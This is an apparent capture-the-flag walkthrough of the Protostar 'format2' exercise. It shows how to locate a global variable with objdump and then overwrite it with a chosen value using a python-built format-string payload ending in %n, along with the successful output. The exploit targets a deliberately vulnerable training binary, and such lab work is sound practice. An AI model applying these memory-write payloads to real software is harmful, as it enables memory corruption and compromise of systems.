This level moves on from format1 and shows how specific values can be written in memory. (link)
This one looks very similar to the last one except we now have to write a specific value to target.
Same as before, we can get the address of target with objdump:
user@protostar:/opt/protostar/bin$ objdump -t ./format2 | grep "target"
080496e4 g O .bss 00000004 target
Now that we have the correct address, let's try what we had from before, except subsituting in the new address for target:
user@protostar:/opt/protostar/bin$ python -c "print '\xe4\x96\x04\x08' + '%08x.'*3 + '%n'" | /opt/protostar/bin/format2
target is 31 :(
The key to getting it to write the value of your choice is knowing that %n will write the total number of bytes read so far.
If we use the format string "%19x.", this takes up 20 bytes (19 for the value + 1 for the '.' character). If we do that three times + the original 4-byte address, we will have used 64 bytes.
Running that with a %n tagged on the end gives you this:
user@protostar:/opt/protostar/bin$ python -c "print '\xe4\x96\x04\x08' + '%19x.'*3 + '%n'" | /opt/protostar/bin/format2
200. b7fd8420. bffff5e4.
you have modified the target :)